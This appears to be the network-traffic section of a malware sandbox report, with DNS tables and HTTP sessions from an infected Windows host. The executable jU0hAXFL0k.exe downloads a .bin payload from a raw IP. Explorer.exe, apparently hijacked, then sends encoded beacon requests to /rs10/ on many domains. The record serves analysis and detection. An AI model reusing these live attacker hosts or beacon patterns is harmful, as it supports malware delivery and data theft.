Oct 16, 2023 11:30:57.452284098 CEST | 65350 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:31:15.319724083 CEST | 54669 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:31:15.586316109 CEST | 53 | 54669 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:31:36.018126011 CEST | 56679 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:31:36.334717035 CEST | 53 | 56679 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:31:56.716643095 CEST | 51002 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:31:56.958108902 CEST | 53 | 51002 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:32:17.430710077 CEST | 58635 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:32:17.615190029 CEST | 53 | 58635 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:32:17.615650892 CEST | 58635 | 53 | 192.168.11.30 | 9.9.9.9
Oct 16, 2023 11:32:17.799532890 CEST | 53 | 58635 | 9.9.9.9 | 192.168.11.30
Oct 16, 2023 11:32:38.160223961 CEST | 59906 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:32:38.329014063 CEST | 53 | 59906 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:32:58.780879021 CEST | 56867 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:32:58.953659058 CEST | 53 | 56867 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:33:05.688920021 CEST | 65191 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:33:19.494623899 CEST | 60534 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:33:20.207951069 CEST | 53 | 60534 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:33:20.208547115 CEST | 60534 | 53 | 192.168.11.30 | 9.9.9.9
Oct 16, 2023 11:33:21.212634087 CEST | 60534 | 53 | 192.168.11.30 | 9.9.9.9
Oct 16, 2023 11:33:22.198084116 CEST | 53 | 60534 | 9.9.9.9 | 192.168.11.30
Oct 16, 2023 11:33:22.758809090 CEST | 53 | 60534 | 9.9.9.9 | 192.168.11.30
Oct 16, 2023 11:33:40.193209887 CEST | 49317 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:33:40.364479065 CEST | 53 | 49317 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:34:00.875941992 CEST | 51210 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:34:01.098836899 CEST | 53 | 51210 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:34:09.782591105 CEST | 57366 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:34:21.574482918 CEST | 50394 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:34:21.818440914 CEST | 53 | 50394 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:34:43.975584984 CEST | 53148 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:34:44.144838095 CEST | 53 | 53148 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:35:03.049592972 CEST | 62543 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:35:03.222152948 CEST | 53 | 62543 | 1.1.1.1 | 192.168.11.30
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 16, 2023 11:26:43.845520020 CEST | 192.168.11.30 | 1.1.1.1 | 0x9039 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:29:12.770318985 CEST | 192.168.11.30 | 1.1.1.1 | 0xa5ea | Standard query (0) | www.juara102-azura.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:29:33.045984983 CEST | 192.168.11.30 | 1.1.1.1 | 0x9194 | Standard query (0) | www.fftsxxx.top | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:29:52.572699070 CEST | 192.168.11.30 | 1.1.1.1 | 0x5172 | Standard query (0) | www.nightoracle.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:30:33.908983946 CEST | 192.168.11.30 | 1.1.1.1 | 0x839b | Standard query (0) | www.thesoftwarepractitioner.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:30:54.607141018 CEST | 192.168.11.30 | 1.1.1.1 | 0x4290 | Standard query (0) | www.jwilkinsartscapeinc.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:30:57.452284098 CEST | 192.168.11.30 | 1.1.1.1 | 0xac15 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:31:15.319724083 CEST | 192.168.11.30 | 1.1.1.1 | 0x2762 | Standard query (0) | www.laserhairremovalkit.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:31:36.018126011 CEST | 192.168.11.30 | 1.1.1.1 | 0xe61f | Standard query (0) | www.omarshafie.online | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:31:56.716643095 CEST | 192.168.11.30 | 1.1.1.1 | 0xbea6 | Standard query (0) | www.electric-cars-19095.bond | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:17.430710077 CEST | 192.168.11.30 | 1.1.1.1 | 0x605a | Standard query (0) | www.kzjsm.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:17.615650892 CEST | 192.168.11.30 | 9.9.9.9 | 0x605a | Standard query (0) | www.kzjsm.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:38.160223961 CEST | 192.168.11.30 | 1.1.1.1 | 0x212e | Standard query (0) | www.calm-plants.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:58.780879021 CEST | 192.168.11.30 | 1.1.1.1 | 0xcb09 | Standard query (0) | www.latitudeinformatics.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:05.688920021 CEST | 192.168.11.30 | 1.1.1.1 | 0x85 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:19.494623899 CEST | 192.168.11.30 | 1.1.1.1 | 0x1382 | Standard query (0) | www.metaastrologia.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:20.208547115 CEST | 192.168.11.30 | 9.9.9.9 | 0x1382 | Standard query (0) | www.metaastrologia.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:21.212634087 CEST | 192.168.11.30 | 9.9.9.9 | 0x1382 | Standard query (0) | www.metaastrologia.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:40.193209887 CEST | 192.168.11.30 | 1.1.1.1 | 0x5d3b | Standard query (0) | www.hdlive7.live | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:34:00.875941992 CEST | 192.168.11.30 | 1.1.1.1 | 0xb12a | Standard query (0) | www.robertjamesfineclothing.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:34:09.782591105 CEST | 192.168.11.30 | 1.1.1.1 | 0x5ed | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:34:21.574482918 CEST | 192.168.11.30 | 1.1.1.1 | 0x48eb | Standard query (0) | www.practicaloutsource.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:34:43.975584984 CEST | 192.168.11.30 | 1.1.1.1 | 0x6e1 | Standard query (0) | www.mtauratarnt.com | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:35:03.049592972 CEST | 192.168.11.30 | 1.1.1.1 | 0xe6ca | Standard query (0) | www.wgardsgm.live | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 16, 2023 11:26:44.012439966 CEST | 1.1.1.1 | 192.168.11.30 | 0x9039 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 16, 2023 11:29:12.940845966 CEST | 1.1.1.1 | 192.168.11.30 | 0xa5ea | No error (0) | www.juara102-azura.com | | 104.21.19.227 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:29:12.940845966 CEST | 1.1.1.1 | 192.168.11.30 | 0xa5ea | No error (0) | www.juara102-azura.com | | 172.67.190.111 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:29:33.470616102 CEST | 1.1.1.1 | 192.168.11.30 | 0x9194 | No error (0) | www.fftsxxx.top | | 172.67.148.68 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:29:33.470616102 CEST | 1.1.1.1 | 192.168.11.30 | 0x9194 | No error (0) | www.fftsxxx.top | | 104.21.39.189 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:29:52.751010895 CEST | 1.1.1.1 | 192.168.11.30 | 0x5172 | No error (0) | www.nightoracle.com | | 103.224.212.210 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:30:34.173155069 CEST | 1.1.1.1 | 192.168.11.30 | 0x839b | No error (0) | www.thesoftwarepractitioner.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 16, 2023 11:30:34.173155069 CEST | 1.1.1.1 | 192.168.11.30 | 0x839b | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:30:54.831906080 CEST | 1.1.1.1 | 192.168.11.30 | 0x4290 | Name error (3) | www.jwilkinsartscapeinc.com | none | none | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:30:57.618825912 CEST | 1.1.1.1 | 192.168.11.30 | 0xac15 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 16, 2023 11:31:15.586316109 CEST | 1.1.1.1 | 192.168.11.30 | 0x2762 | No error (0) | www.laserhairremovalkit.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 16, 2023 11:31:15.586316109 CEST | 1.1.1.1 | 192.168.11.30 | 0x2762 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:31:36.334717035 CEST | 1.1.1.1 | 192.168.11.30 | 0xe61f | No error (0) | www.omarshafie.online | | 66.96.162.133 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:31:56.958108902 CEST | 1.1.1.1 | 192.168.11.30 | 0xbea6 | No error (0) | www.electric-cars-19095.bond | | 104.247.82.90 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:17.615190029 CEST | 1.1.1.1 | 192.168.11.30 | 0x605a | Server failure (2) | www.kzjsm.com | none | none | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:17.799532890 CEST | 9.9.9.9 | 192.168.11.30 | 0x605a | Server failure (2) | www.kzjsm.com | none | none | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:38.329014063 CEST | 1.1.1.1 | 192.168.11.30 | 0x212e | Name error (3) | www.calm-plants.com | none | none | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:58.953659058 CEST | 1.1.1.1 | 192.168.11.30 | 0xcb09 | No error (0) | www.latitudeinformatics.com | latitudeinformatics.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 16, 2023 11:32:58.953659058 CEST | 1.1.1.1 | 192.168.11.30 | 0xcb09 | No error (0) | latitudeinformatics.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:32:58.953659058 CEST | 1.1.1.1 | 192.168.11.30 | 0xcb09 | No error (0) | latitudeinformatics.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:05.856195927 CEST | 1.1.1.1 | 192.168.11.30 | 0x85 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 16, 2023 11:33:20.207951069 CEST | 1.1.1.1 | 192.168.11.30 | 0x1382 | Server failure (2) | www.metaastrologia.com | none | none | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:22.198084116 CEST | 9.9.9.9 | 192.168.11.30 | 0x1382 | Server failure (2) | www.metaastrologia.com | none | none | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:22.758809090 CEST | 9.9.9.9 | 192.168.11.30 | 0x1382 | Server failure (2) | www.metaastrologia.com | none | none | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:40.364479065 CEST | 1.1.1.1 | 192.168.11.30 | 0x5d3b | No error (0) | www.hdlive7.live | | 172.67.193.177 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:33:40.364479065 CEST | 1.1.1.1 | 192.168.11.30 | 0x5d3b | No error (0) | www.hdlive7.live | | 104.21.12.56 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:34:01.098836899 CEST | 1.1.1.1 | 192.168.11.30 | 0xb12a | No error (0) | www.robertjamesfineclothing.com | | 104.247.82.51 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:34:09.949165106 CEST | 1.1.1.1 | 192.168.11.30 | 0x5ed | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 16, 2023 11:34:21.818440914 CEST | 1.1.1.1 | 192.168.11.30 | 0x48eb | No error (0) | www.practicaloutsource.com | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:34:44.144838095 CEST | 1.1.1.1 | 192.168.11.30 | 0x6e1 | No error (0) | www.mtauratarnt.com | | 172.67.210.176 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:34:44.144838095 CEST | 1.1.1.1 | 192.168.11.30 | 0x6e1 | No error (0) | www.mtauratarnt.com | | 104.21.69.174 | A (IP address) | IN (0x0001) | false
Oct 16, 2023 11:35:03.222152948 CEST | 1.1.1.1 | 192.168.11.30 | 0xe6ca | Name error (3) | www.wgardsgm.live | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.30 | 50125 | 103.72.68.128 | 80 | C:\Users\user\Desktop\jU0hAXFL0k.exe
Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:27:46.501035929 CEST | 77 | OUT | GET /pcd/zkltfDHOiVw63.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 103.72.68.128
Cache-Control: no-cache
Oct 16, 2023 11:27:46.862828970 CEST | 79 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Oct 2023 09:27:45 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
Last-Modified: Mon, 16 Oct 2023 00:41:11 GMT
ETag: "2e640-607caa9a6ee27"
Accept-Ranges: bytes
Content-Length: 190016
Content-Type: application/octet-stream
                                                                                      Data Ascii: jN]sPG'L{1$XZ]=|=f`Qds*yO#9SQF$+U.[$hu<>BV7L)SyMA,pJ+2`HEt_0V<f3/:/rlz=6 8rv)znCp<1[*<evzY


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.30 | 50127 | 104.21.19.227 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:29:13.108417034 CEST | 283 | OUT | GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM HTTP/1.1
  Host: www.juara102-azura.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Oct 16, 2023 11:29:13.284326077 CEST | 284 | IN | HTTP/1.1 301 Moved Permanently
  Date: Mon, 16 Oct 2023 09:29:13 GMT
  Transfer-Encoding: chunked
  Connection: close
  Cache-Control: max-age=3600
  Expires: Mon, 16 Oct 2023 10:29:13 GMT
  Location: https://www.juara102-azura.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2iEw8wN%2FCNaD96Kp0Uwi%2BVUVsnNT8ze3UqrWrAfmtpb2n2uSX0K4k4%2Bnef46cy2V%2FaiWw220lUKYJe9DvURRmDLkLoFb%2F8EMPMKxjdLJfH2Cu8vLh%2FLUXzOM%2BqJihGrkY8q7gGgHCJwv"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  X-Content-Type-Options: nosniff
  Server: cloudflare
  CF-RAY: 816f46b17e7e7ee3-LAX
  alt-svc: h3=":443"; ma=86400
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.11.30 | 50142 | 104.247.82.51 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:34:01.586007118 CEST | 335 | OUT | GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt HTTP/1.1
  Host: www.robertjamesfineclothing.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Oct 16, 2023 11:34:01.828512907 CEST | 336 | IN | HTTP/1.1 403 Forbidden
  Server: nginx
  Date: Mon, 16 Oct 2023 09:34:01 GMT
  Content-Type: text/html
  Content-Length: 146
  Connection: close
  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Oct 16, 2023 11:34:02.031711102 CEST | 336 | IN | HTTP/1.1 403 Forbidden
  Server: nginx
  Date: Mon, 16 Oct 2023 09:34:01 GMT
  Content-Type: text/html
  Content-Length: 146
  Connection: close
  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.11.30 | 50146 | 208.91.197.27 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:34:22.055358887 CEST | 345 | OUT | GET /rs10/?wr5xXxu=tnlFoTupmPEe2FuJuv6YyFNcBynACc4EqLKIKpHaKJfweHMHroc5yQmaieiVC2idvHp8&CZF=FZ4P3Z3Pkfe HTTP/1.1
  Host: www.practicaloutsource.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Oct 16, 2023 11:34:22.340970993 CEST | 345 | IN | HTTP/1.1 403 Forbidden
  Date: Mon, 16 Oct 2023 09:34:22 GMT
  Server: Apache
  Content-Length: 302
  Content-Type: text/html; charset=UTF-8
  Connection: close
  Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (35)</h3> ...- 102.129.145.32---></div></body></html>
Oct 16, 2023 11:34:22.542505980 CEST | 346 | IN | HTTP/1.1 403 Forbidden
  Date: Mon, 16 Oct 2023 09:34:22 GMT
  Server: Apache
  Content-Length: 302
  Content-Type: text/html; charset=UTF-8
  Connection: close
  Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (35)</h3> ...- 102.129.145.32---></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.11.30 | 50147 | 172.67.210.176 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:34:44.313076019 CEST | 347 | OUT | GET /rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8 HTTP/1.1
  Host: www.mtauratarnt.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.11.30 | 50128 | 172.67.148.68 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:29:33.638444901 CEST | 285 | OUT | GET /rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe HTTP/1.1
  Host: www.fftsxxx.top
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Oct 16, 2023 11:29:34.123421907 CEST | 286 | IN | HTTP/1.1 404 Not Found
  Date: Mon, 16 Oct 2023 09:29:34 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ES6qWQ3CPXdPIdfdI9zYyCmb73rUtvrX%2F%2Fnyne9bZeX5Xn3hRgtL2LEh0mhaStAWviGkhpGZn44kD1Ih%2BhMvRsXuTZQsUxSwjiIjux%2FE3lyO1sDkR8wGr9QYNoB7ruoVn24%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 816f4731cb992f35-LAX
  alt-svc: h3=":443"; ma=86400
  Data Ascii: 4bf<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>404: This page could not be found</title> </head> <body> <script rel="nofollow" language="javascript" type="text/javascript" src="/Aquery.js"></script> <script rel="nofollow" language="javascript" type="text/javascript" src="/Baidu.js"></script> <div style="font-family: system-ui, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; height: 100vh; text-align: center; display: flex; flex-direction: column; align-items: center; justify-content: center"> <div> <h1 style="font-size: 24px; font-weight: 500; color: red">
Oct 16, 2023 11:29:34.123528004 CEST | 287 | IN | Data Raw: 20 20 20 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 33 70 78 20 73 6f 6c 69 64 20 62 6c 75 65 22 3e 34 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65
  Data Ascii: <span style="border-bottom: 3px solid blue">4</span> <span style="border-bottom: 3px solid blue">0</span> <span style="border-bottom: 3px solid blue">4</span> </h1> <div style="display: inline-blo
Oct 16, 2023 11:29:34.123585939 CEST | 287 | IN | Data Raw: 32 0d 0a 0d 0a 0d 0a
  Data Ascii: 2
Oct 16, 2023 11:29:34.123644114 CEST | 287 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.11.30 | 50129 | 103.224.212.210 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:29:52.922185898 CEST | 287 | OUT | GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g HTTP/1.1
  Host: www.nightoracle.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Oct 16, 2023 11:29:53.120343924 CEST | 288 | IN | HTTP/1.1 302 Found
  date: Mon, 16 Oct 2023 09:29:53 GMT
  server: Apache
  set-cookie: __tad=1697448593.2485212; expires=Thu, 13-Oct-2033 09:29:53 GMT; Max-Age=315360000
  location: http://ww38.nightoracle.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g
  content-length: 2
  content-type: text/html; charset=UTF-8
  connection: close
  Data Raw: 0a 0a
  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.11.30 | 50130 | 23.227.38.74 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:30:34.341609955 CEST | 289 | OUT | GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=Jl6D3AYJMpsoqEFrbY4lXgI+CqA8jAhhEBHBOp3JwZxwH/kCFGDnFMsoz66PDEG/ZKuf HTTP/1.1
  Host: www.thesoftwarepractitioner.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Oct 16, 2023 11:30:34.520132065 CEST | 290 | IN | HTTP/1.1 403 Forbidden
  Date: Mon, 16 Oct 2023 09:30:34 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4517
  Connection: close
  X-Frame-Options: SAMEORIGIN
  Referrer-Policy: same-origin
  Cache-Control: max-age=15
  Expires: Mon, 16 Oct 2023 09:30:49 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EwDGESFM00gACgrIKYzV%2Bi6Ot6dcvfzCh4HacvjyBdTdtZN1kUc4p7nogLAy%2BThEuU9M%2FizgXBKpSmchVSmw%2BDiMQ8FveVHe9lz7cA%2F04pOsdC64Vx58BzrdnZXzGIYv4M52rNTkiGnp6rpjkBZFlLY%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
  Server-Timing: cfRequestDuration;dur=11.000156
  Server: cloudflare
  CF-RAY: 816f48ad2f172ac3-LAX
  alt-svc: h3=":443"; ma=86400
  Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="rob
Oct 16, 2023 11:30:34.520214081 CEST | 291 | IN | Data Raw: 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69
  Data Ascii: ots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-i
Oct 16, 2023 11:30:34.520272017 CEST | 293 | IN | Data Raw: 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e
  Data Ascii: hot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns
Oct 16, 2023 11:30:34.520325899 CEST | 294 | IN | Data Raw: 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d
  Data Ascii: der-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">816f48ad2f172ac3</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</
Oct 16, 2023 11:30:34.520369053 CEST | 294 | IN | Data Raw: 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f
  Data Ascii: rror-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.11.30 | 50133 | 23.227.38.74 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:31:15.754112005 CEST | 302 | OUT | GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn HTTP/1.1
Host: www.laserhairremovalkit.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
